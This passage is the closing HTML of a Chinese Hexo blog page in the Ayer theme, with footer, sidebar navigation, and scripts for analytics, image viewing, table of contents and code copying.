            padding: 5px 0px;
        }
    }

    #vcomments-box #vcomments {
        background-color: #fff;
    }

    .v .vlist .vcard .vh {
        padding-right: 20px;
    }

    .v .vlist .vcard {
        padding-left: 10px;
    }
</style>

  

  
  
  
  
  

</article>
</section>
      <footer class="footer">
  <div class="outer">
    <ul>
      <li>
        Copyrights &copy;
        2015-2021
        <i class="ri-heart-fill heart_icon"></i> John Doe
      </li>
    </ul>
    <ul>
      <li>
        
        
        
        由 <a href="https://hexo.io" target="_blank">Hexo</a> 强力驱动
        <span class="division">|</span>
        主题 - <a href="https://github.com/Shen-Yu/hexo-theme-ayer" target="_blank">Ayer</a>
        
      </li>
    </ul>
    <ul>
      <li>
        
        
        <span>
  <span><i class="ri-user-3-fill"></i>访问人数:<span id="busuanzi_value_site_uv"></span></s>
  <span class="division">|</span>
  <span><i class="ri-eye-fill"></i>浏览次数:<span id="busuanzi_value_page_pv"></span></span>
</span>
        
      </li>
    </ul>
    <ul>
      
    </ul>
    <ul>
      <li>
        <!-- cnzz统计 -->
        
        <script type="text/javascript" src='https://s4.cnzz.com/z_stat.php?id=1278951134&amp;web_id=1278951134'></script>
        
      </li>
    </ul>
  </div>
</footer>
      <div class="float_btns">
        <div class="totop" id="totop">
  <i class="ri-arrow-up-line"></i>
</div>

<div class="todark" id="todark">
  <i class="ri-moon-line"></i>
</div>

      </div>
    </main>
    <aside class="sidebar on">
      <button class="navbar-toggle"></button>
<nav class="navbar">
  
  <div class="logo">
    <a href="/"><img src="/images/ayer-side.svg" alt="Time"></a>
  </div>
  
  <ul class="nav nav-main">
    
    <li class="nav-item">
      <a class="nav-item-link" href="/">主页</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/archives">归档</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/categories">分类</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/tags">标签</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/suibi">随笔</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/about">关于我</a>
    </li>
    
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      
      <a class="nav-item-link nav-item-search"  title="搜索">
        <i class="ri-search-line"></i>
      </a>
      
      
      <a class="nav-item-link" target="_blank" href="/atom.xml" title="RSS Feed">
        <i class="ri-rss-line"></i>
      </a>
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
    </aside>
    <script>
      if (window.matchMedia("(max-width: 768px)").matches) {
        document.querySelector('.content').classList.remove('on');
        document.querySelector('.sidebar').classList.remove('on');
      }
    </script>
    <div id="mask"></div>

<!-- #reward -->
<div id="reward">
  <span class="close"><i class="ri-close-line"></i></span>
  <p class="reward-p"><i class="ri-cup-line"></i></p>
  <div class="reward-box">
    
    
  </div>
</div>
    
<script src="/js/jquery-2.0.3.min.js"></script>


<script src="/js/lazyload.min.js"></script>

<!-- Subtitle -->

<script>
  try {
    var typed = new Typed("#subtitle", {
      strings: ['面朝大海，春暖花开', '愿你一生努力，一生被爱', '想要的都拥有，得不到的都释怀'],
      startDelay: 0,
      typeSpeed: 200,
      loop: true,
      backSpeed: 100,
      showCursor: true
    });
  } catch (err) {
    console.log(err)
  }
</script>

<!-- Tocbot -->


<script src="/js/tocbot.min.js"></script>

<script>
  tocbot.init({
    tocSelector: '.tocbot',
    contentSelector: '.article-entry',
    headingSelector: 'h1, h2, h3, h4, h5, h6',
    hasInnerContainers: true,
    scrollSmooth: true,
    scrollContainer: 'main',
    positionFixedSelector: '.tocbot',
    positionFixedClass: 'is-position-fixed',
    fixedSidebarOffset: 'auto'
  });
</script>

<script src="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.js"></script>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.css">
<script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js"></script>

<script src="/dist/main.js"></script>

<!-- ImageViewer -->

<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>

    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">

        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                <!--  Controls are self-explanatory. Order can be changed. -->

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" style="display:none" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div>

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.min.css">
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"></script>

<script>
    function viewer_init() {
        let pswpElement = document.querySelectorAll('.pswp')[0];
        let $imgArr = document.querySelectorAll(('.article-entry img:not(.reward-img)'))

        $imgArr.forEach(($em, i) => {
            $em.onclick = () => {
                // slider展开状态
                // todo: 这样不好，后面改成状态
                if (document.querySelector('.left-col.show')) return
                let items = []
                $imgArr.forEach(($em2, i2) => {
                    let img = $em2.getAttribute('data-idx', i2)
                    let src = $em2.getAttribute('data-target') || $em2.getAttribute('src')
                    let title = $em2.getAttribute('alt')
                    // 获得原图尺寸
                    const image = new Image()
                    image.src = src
                    items.push({
                        src: src,
                        w: image.width || $em2.width,
                        h: image.height || $em2.height,
                        title: title
                    })
                })
                var gallery = new PhotoSwipe(pswpElement, PhotoSwipeUI_Default, items, {
                    index: parseInt(i)
                });
                gallery.init()
            }
        })
    }
    viewer_init()
</script>

<!-- MathJax -->

<!-- Katex -->

<!-- busuanzi  -->


<script src="/js/busuanzi-2.3.pure.min.js"></script>


<!-- ClickLove -->

<!-- ClickBoom -->

<!-- CodeCopy -->


<link rel="stylesheet" href="/css/clipboard.css">

<script src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js"></script>
<script>
  function wait(callback, seconds) {
    var timelag = null;
    timelag = window.setTimeout(callback, seconds);
  }
  !function (e, t, a) {
    var initCopyCode = function(){
      var copyHtml = '';
      copyHtml += '<button class="btn-copy" data-clipboard-snippet="">';
      copyHtml += '<i class="ri-file-copy-2-line"></i><span>COPY</span>';
      copyHtml += '</button>';
      $(".highlight .code pre").before(copyHtml);
      $(".article pre code").before(copyHtml);
      var clipboard = new ClipboardJS('.btn-copy', {
        target: function(trigger) {
          return trigger.nextElementSibling;
        }
      });
      clipboard.on('success', function(e) {
        let $btn = $(e.trigger);
        $btn.addClass('copied');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-checkbox-circle-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPIED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-checkbox-circle-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
      clipboard.on('error', function(e) {
        e.clearSelection();
        let $btn = $(e.trigger);
        $btn.addClass('copy-failed');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-time-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPY FAILED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-time-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
    }
    initCopyCode();
  }(window, document);
</script>



    
  </div>
</body>

</html>